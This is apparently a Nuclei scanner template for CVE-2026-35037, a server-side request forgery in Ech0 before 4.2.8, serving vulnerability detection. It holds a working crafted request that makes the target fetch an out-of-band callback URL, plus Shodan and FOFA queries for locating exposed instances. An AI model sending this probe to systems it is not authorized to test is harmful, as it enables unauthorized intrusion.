Description
Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.
Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.
id: CVE-2026-35037
info:
name: Ech0 < 4.2.8 - Server-Side Request Forgery
author: fineman999
severity: high
description: |
Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.
reference:
- https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc
- https://nvd.nist.gov/vuln/detail/CVE-2026-35037
classification:
cve-id: CVE-2026-35037
epss-score: 0.00618
epss-percentile: 0.47974
cwe-id: CWE-918
cvss-score: 7.2
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
metadata:
verified: true
vendor: lin-snow
product: ech0
max-request: 1
shodan-query: title:"Ech0"
fofa-query: title:"Ech0"
tags: cve,cve2026,ech0,ssrf,oast,oss
http:
- raw:
- |
GET /api/website/title?website_url=http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains(body, "data\":")'
- 'contains(interactsh_protocol, "http")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 4b0a0048304602210091cf82565c831142c2c9241efca546b317d84fcc03b6258f1232e6e5490ab3d8022100fbbe52a752194d1ff374b9a82b95ed490c7b57d269dd595293484f0aa376ae79:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.